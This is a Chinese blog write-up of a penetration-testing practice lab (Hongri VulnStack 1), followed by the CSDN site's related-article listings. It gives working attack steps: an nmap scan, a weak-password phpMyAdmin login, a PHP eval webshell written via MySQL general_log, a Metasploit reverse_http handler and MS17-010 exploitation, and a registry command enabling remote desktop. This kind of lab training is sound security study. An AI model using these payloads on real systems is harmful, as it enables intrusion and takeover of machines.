红日靶场一

最新推荐文章于 2024-06-07 10:05:34 发布
置顶 最新推荐文章于 2024-06-07 10:05:34 发布
阅读量86 收藏
点赞数
分类专栏: 渗透测试靶场 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61899124/article/details/131071013
版权

目录

靶场搭建

1.新建一个仅主机模式的网络,VMnet15

2.添加网络适配器

WEB服务器渗透

1.端口扫描

2.登录后台

3.一句话木马

4.上线cs

内网渗透

1.内网主机存活扫描

2.systeminfo发现域

3.查找域控

4.明文密码

5.域控上线cs

6.win2003上线

靶场搭建

1.新建一个仅主机模式的网络,VMnet15

2.添加网络适配器

将windows2003和windows2008和windows7主机都设置为自定义VMnet15

攻击主机kali为net

设置好之后,win7主机开启phpsyudy,配置就完成了

win7 内网网段192.168.152.128

win2003 内网网段192.168.152.129

win2008 内网网段192.168.152.130

WEB服务器渗透

1.端口扫描

nmap -sS -sV -Pn 192.168.152.128

发现开放80端口证明存在http网站

开放了3306端口,存在mysql数据库,可能存在弱口令

访问网页,发现为phpstudy探针,说明网站是phpstudy搭建的

发现mysql存在root,root弱口令

2.登录后台

网站是由phpstudy搭建的就可能存在phpmyadmin后台

弱口令root,root,成功登录到后台

3.一句话木马

查看数据库是否有导入权限,看能否直接导入木马

SHOW GLOBAL VARIABLES LIKE '%secure%'

没有导入权限

查看是否有开启日志记录

SHOW GLOBAL VARIABLES LIKE '%general%'

日志记录功能关闭,但是可以开启

SET GLOBAL general_log = ON

SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'

插入木马

select '<?php eval ($_POST[hack]);?>'

用蚁剑连接

4.上线cs

使用cs生成一个木马,通过蚁剑上传并执行

上线成功后,首先执行sleep 0

内网渗透

1.内网主机存活扫描

2.systeminfo发现域

3.查找域控

shell net time /domain

4.明文密码

5.域控上线cs

生成一个正向监听

上线成功

6.win2003上线

cs设置5555端口监听

开启msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.164.134
set lport 5555
run

设置路由

run post/multi/manage/autoroute
run autoroute -p
bg

search ms 17_010
use 2
set rhosts 192.168.152.129
//开启3389
'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t 00000000 /f'
run

设置代理

设置小红帽

开启远程桌面

仙322
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日靶场1
woshicainiao666的博客
01-13 1254
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
红日靶场1搭建&渗透
m0_75178803的博客
02-03 2167
前面我们登录进去之后,可以看到还有一个yxcms的数据库,同时我们进入后台之后,可以看到一个 beifen.rar备份文件和yxcms目录,这道题其实还有一种getshell的方法,这里我们也记录一下。那么如果修改 general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell。,即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入,也能访问页面,那就用蚁剑直接连一下看看。
解决WIN2003不能玩CS1.5
weixin_30455365的博客
05-12 99
网上找到的如下方法,经试验成功,把方法里面用到的文件也上传了上来 1)缺少视频压缩文件 2)不支持OpenGL模式 第一步解决win2003CS(主要是1.5)缺少视频压缩的办法: 一 开始-运行-输入dxdiag,在显示中启用DirectDraw 二 在Windows XP或2000系统中找到ir32_32.dl_和iccvid.dl_两个文件,复制到win2003的...
内网渗透—代理Socks协议、路由不出网、SMB绕过、CS-MSF控制上线
剁椒鱼头没剁椒的博客
05-26 1510
本篇和上篇文章前置的知识基本差不多,这里我就不在赘述了,感兴趣的可以去上CSDN上或者公众号找上篇内容,那篇中涉及到了很多的前置知识,本篇主要以实操为主。攻击机的目标是Windows7系统,而攻击机是无法直接连接Windows7,如果这里不了解我说的是什么意思,请去学习一下路由原理吧!自然而然下面也就不用解释了,肯定是能够连接能够连接能够连接到Windows7。目前攻击机只能够连接,但是我们可以通过采用一些技术而实现和Windows7通信,这技术也就是本章需要介绍的。这里我们不考虑是通过如何手段获取到。
红日安全靶机实战(一) CS
qq_41891666的博客
08-09 1530
0x00 前言 之前是用 msf 来做的,这次尝试尝试用 CS 来做。之前得到webshell 的步骤就不说了,一样的。直接从CS 上线开始讲起。 0x01 CS 上线
内网渗透-cs上线之提权测试方法
lza20001103的博客
05-08 5058
cs上线之提权方法
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
漏洞靶场平台搭建与漏洞分析文档
04-29
漏洞靶场平台搭建与漏洞分析文档,里面包含漏洞靶场网站的搭建、漏洞分析、工具使用、漏洞脚本样例,来源是红日安全,大家一起学习,进步!
红日串词.doc
09-16
红日串词.doc
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8279
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 860
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
应用程序加固的优势及其在移动应用安全中的重要性
gulu230220的博客
06-05 353
通过提升应用程序的安全性、防止应用程序被篡改、提高应用程序的抗攻击能力、保护应用程序的知识产权和提升用户体验和信任度,加固技术可以有效保障移动应用的安全和稳定,为用户提供更加安全和可靠的移动应用服务。通过加固应用程序的安全漏洞和弱点,加固技术可以防止黑客利用已知的攻击手段和工具对应用程序进行攻击,提高应用程序的安全性和稳定性。通过加密和混淆应用程序的源代码和关键算法,加固技术可以防止黑客和竞争对手获取应用程序的源代码和商业机密,保护开发者的创新成果和商业利益。应用程序加固能够有效提升移动应用程序的安全性。
读书笔记-《软件定义安全》之二:SDN/NFV环境中的安全问题
wuxiaobing1234的博客
06-07 686
南向协议主要侧重于南向接口上的数据转发、网络配置、数据平面信息收集等功能。OpenFlow协议OpenFlow是SDN的标志性技术,他体现了SDN的核心思想:控制与转发分离。它通过流表控制技术支持用户对数据流行为进行控制。OpenFlow交换机根据流表来转发数据包,代表数据转发平面;控制器通过全网络视图来实现管控功能,其控制逻辑表示控制平面。OpenFlow协议的发展演进一直都围绕着两个方面,一方面是控制平面的增强,让系统功能更丰富、更灵活;
纷享销客安全体系:数据安全
最新发布
fxiaoke_com的博客
06-07 560
纷享销客CRM系统部署了综合性的防勒索软件系统,该系统融合了网络分区、访问控制以及备份解决方案等多重防护措施,旨在有效应对针对企业的勒索软件攻击,从而确保企业数据的安全性和业务的连续性。同时,公司积极响应数据主体的各种隐私权利要求,如访问权、更正权和删除权等,确保个人信息安全、机密,并防止任何未经授权的访问和滥用行为的发生。当租户发出请求时,系统要求携带经过高标准加密的身份信息,以便数据隔离算法能够精确识别不同租户的请求,并据此决定数据的存储与读取路径,从而满足租户间数据隔离的严格需求。
边缘数据采集网关为企业提供高效、安全、可靠的数据采集解决方案-天拓四方
2401_84969963的博客
06-05 497
同时,通过对网关采集上来的数据进行分析,企业还能够发现生产过程中的瓶颈和问题,进一步优化生产流程和提高产品质量。传统的数据采集系统往往采用集中式的架构,所有数据都需要传输到中央服务器进行处理,这不仅增加了数据传输的延迟,还可能导致数据泄露的风险。然而,在转型过程中,许多企业面临着数据采集的难题。设备兼容性:边缘数据采集网关采用标准的通信协议和接口,能够与多种设备进行连接和通信,实现了设备之间的无缝对接。实时性:由于数据采集和处理工作都在设备边缘进行,大大减少了数据传输的延迟,实现了数据的实时采集和反馈。
浅谈安全用电管理系统对重要用户的安全管理
jiajia8848111的博客
06-04 537
认真学国家安全生产的方针、政策,全面掌握重要客户供用电安全的状况,明晰重要客户供用电安全的隐患责任主体,督促电力用户建立健全安全工作机构,制订停电应急预案和应急措施,确定专人负责安全用电工作,建立重要客户供用电安全隐患技术档案,健全排查、治理安全隐患的相关规定,做到分工明确,考核严格。本平台适用于智能楼宇、高层公寓、宾馆、饭店、商厦、工矿企业、国家重点消防单位以及石油化工、文教卫生、金融、电信等领域,也适用于市场、门店等小微场所,对分散在建筑内的探测器进行遥测、遥调、遥控、遥信,方便实现监控与管理。
跨区域文件管控过程中 如何保障安全和效率?
文件数据安全交换
06-03 583
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值